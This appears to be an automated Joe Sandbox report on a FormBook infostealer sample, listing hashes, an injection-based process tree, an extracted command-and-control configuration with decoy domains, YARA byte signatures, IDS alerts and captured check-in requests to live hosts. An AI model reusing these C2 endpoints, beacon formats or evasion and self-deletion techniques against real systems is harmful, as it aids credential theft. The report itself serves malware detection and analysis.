Loading ...

Play interactive tourEdit tour

Windows Analysis Report ClgNlmU3Is.exe

Overview

General Information

Sample Name:ClgNlmU3Is.exe
Analysis ID:502318
MD5:2fe634ab1348a94f5a2f8712d8b4ee44
SHA1:1c6e453bc403da0ae1ea75f96ab90cdf86472665
SHA256:9136c283e5029c2f073b706014f6f73b67ead84450267cb5ce0dd26cbcecaa25
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • ClgNlmU3Is.exe (PID: 2884 cmdline: 'C:\Users\user\Desktop\ClgNlmU3Is.exe' MD5: 2FE634AB1348A94F5A2F8712D8B4EE44)
    • ClgNlmU3Is.exe (PID: 5744 cmdline: C:\Users\user\Desktop\ClgNlmU3Is.exe MD5: 2FE634AB1348A94F5A2F8712D8B4EE44)
    • ClgNlmU3Is.exe (PID: 1340 cmdline: C:\Users\user\Desktop\ClgNlmU3Is.exe MD5: 2FE634AB1348A94F5A2F8712D8B4EE44)
      • explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 1808 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 5700 cmdline: /c del 'C:\Users\user\Desktop\ClgNlmU3Is.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.345807116.0000000000EA0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.345807116.0000000000EA0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.345807116.0000000000EA0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000000.318011069.000000000E059000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000000.318011069.000000000E059000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.ClgNlmU3Is.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.ClgNlmU3Is.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.ClgNlmU3Is.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
        • 0x15d18:$sqlite3text: 68 38 2A 90 C5
        • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
        5.2.ClgNlmU3Is.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.ClgNlmU3Is.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 8 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000000.00000002.263533498.0000000003889000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: ClgNlmU3Is.exeVirustotal: Detection: 12%Perma Link
          Source: ClgNlmU3Is.exeReversingLabs: Detection: 14%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.ClgNlmU3Is.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.ClgNlmU3Is.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ClgNlmU3Is.exe.39f3c40.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ClgNlmU3Is.exe.39a9e20.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.345807116.0000000000EA0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.318011069.000000000E059000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.345863832.0000000000ED0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.263533498.0000000003889000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.521138198.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.345176789.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.299864210.000000000E059000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.525770741.0000000002E10000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.524773419.0000000002B10000.00000040.00020000.sdmp, type: MEMORY
          Source: 5.2.ClgNlmU3Is.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: ClgNlmU3Is.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: ClgNlmU3Is.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: control.pdb source: ClgNlmU3Is.exe, 00000005.00000002.345644202.0000000000CA9000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: ClgNlmU3Is.exe, 00000005.00000002.346109606.000000000105F000.00000040.00000001.sdmp, control.exe, 00000012.00000002.527412025.00000000047AF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: ClgNlmU3Is.exe, 00000005.00000002.346109606.000000000105F000.00000040.00000001.sdmp, control.exe
          Source: Binary string: control.pdbUGP source: ClgNlmU3Is.exe, 00000005.00000002.345644202.0000000000CA9000.00000004.00000020.sdmp
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exeCode function: 4x nop then pop ebx5_2_00406AB9
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop ebx18_2_02E16AB9

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49801 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49801 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49801 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49804 -> 74.220.199.6:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49804 -> 74.220.199.6:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49804 -> 74.220.199.6:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49823 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49823 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49823 -> 34.102.136.180:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.seal-brother.com
          Source: C:\Windows\explorer.exeNetwork Connect: 151.106.119.144 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.qywyfeo8.xyz
          Source: C:\Windows\explorer.exeDomain query: www.athafood.com
          Source: C:\Windows\explorer.exeNetwork Connect: 74.220.199.6 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.doggycc.com
          Source: C:\Windows\explorer.exeNetwork Connect: 185.230.60.102 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.eclecticrenaissancewoman.com
          Source: C:\Windows\explorer.exeDomain query: www.tablescaperendezvous4two.com
          Source: C:\Windows\explorer.exeDomain query: www.hartfulcleaning.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 59.106.13.53 80Jump to behavior
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.qywyfeo8.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.esyscoloradosprings.com/fqiq/
          Source: Joe Sandbox ViewASN Name: WIX_COMIL WIX_COMIL
          Source: Joe Sandbox ViewASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE
          Source: global trafficHTTP traffic detected: GET /fqiq/?Hb08=6JOAu55Y8Xzp5was3x3zF3lJbu5eEm2HTNz3vpdd7KIK0WEVLfillQ9z+rMr7mc/lcAimk0NkA==&s6=z484 HTTP/1.1Host: www.tablescaperendezvous4two.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?Hb08=tdw/kGifcRQg4xawfHQmMwAAiMBNQnR2khC/NrDNjqaKgTZ0vjz3oBz05sNQvFL8j7TnHhbqsg==&s6=z484 HTTP/1.1Host: www.doggycc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?Hb08=uHvuYmjgw/ClkyRj1Ej7vtyQWzU3HFRSMqPjxcCXctDPT+ZSz8NKmBzsVhzcWgEZit3oXGWMXw==&s6=z484 HTTP/1.1Host: www.hartfulcleaning.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?Hb08=r0/ZbJthoN4UODxp6ktEAad/47kkdxrfw2EOWc1ElJDlJlQ4qxy1M7DmODdfHJyPJG8yEJi/Mg==&s6=z484 HTTP/1.1Host: www.eclecticrenaissancewoman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?Hb08=mnFbYCr8dRmDLyqklk1rPiA6Of2qOAThWl37YLVanslLOc89q6CMhoedr+7sZO9vcU+qRF0rgQ==&s6=z484 HTTP/1.1Host: www.seal-brother.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?Hb08=whGcnAY+p5z1rRe/fmSdvfSEJoFYodGcl+5aIh9wENe/LQ+yrONZ1XbZa9wseLnSfrq3uQOSsg==&s6=z484 HTTP/1.1Host: www.athafood.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?Hb08=LbdaYrSuq7QDvfsS7oVDq2uzukwE8JpfT8hIBAsO2A/TzW5xSQi4YlBQHFWhJAqsjukGZieEfA==&s6=z484 HTTP/1.1Host: www.farmersfirstseed.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 185.230.60.102 185.230.60.102
          Source: Joe Sandbox ViewIP Address: 74.220.199.6 74.220.199.6
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 17:49:57 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f9601-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 17:50:02 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f93b1-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 17:50:35 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f9601-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000007.00000000.270713546.0000000006840000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: control.exe, 00000012.00000002.531021595.0000000004D42000.00000004.00020000.sdmpString found in binary or memory: http://www.bluehost.com/
          Source: control.exe, 00000012.00000002.531021595.0000000004D42000.00000004.00020000.sdmpString found in binary or memory: http://www.bluehost.com/cgi-bin/partner
          Source: control.exe, 00000012.00000002.531021595.0000000004D42000.00000004.00020000.sdmpString found in binary or memory: http://www.bluehost.com/cgi/help
          Source: control.exe, 00000012.00000002.531021595.0000000004D42000.00000004.00020000.sdmpString found in binary or memory: http://www.bluehost.com/cgi/info/about_us
          Source: control.exe, 00000012.00000002.531021595.0000000004D42000.00000004.00020000.sdmpString found in binary or memory: http://www.bluehost.com/cgi/info/awards
          Source: control.exe, 00000012.00000002.531021595.0000000004D42000.00000004.00020000.sdmpString found in binary or memory: http://www.bluehost.com/cgi/info/contact_us
          Source: control.exe, 00000012.00000002.531021595.0000000004D42000.00000004.00020000.sdmpString found in binary or memory: http://www.bluehost.com/cgi/terms
          Source: ClgNlmU3Is.exe, 00000000.00000003.253345811.0000000005784000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coma
          Source: ClgNlmU3Is.exe, 00000000.00000003.254086293.0000000005776000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comadi?
          Source: ClgNlmU3Is.exe, 00000000.00000003.254086293.0000000005776000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comech
          Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: ClgNlmU3Is.exe, 00000000.00000002.263162009.0000000002881000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
          Source: ClgNlmU3Is.exe, 00000000.00000003.255235267.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmp, ClgNlmU3Is.exe, 00000000.00000002.262998443.0000000000FC7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: ClgNlmU3Is.exe, 00000000.00000003.255235267.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comFJ
          Source: ClgNlmU3Is.exe, 00000000.00000002.266217159.0000000005778000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comaC
          Source: ClgNlmU3Is.exe, 00000000.00000003.255235267.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalic
          Source: ClgNlmU3Is.exe, 00000000.00000003.255235267.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalicX
          Source: ClgNlmU3Is.exe, 00000000.00000003.255235267.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comituo
          Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: ClgNlmU3Is.exe, 00000000.00000003.253105529.0000000005781000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
          Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
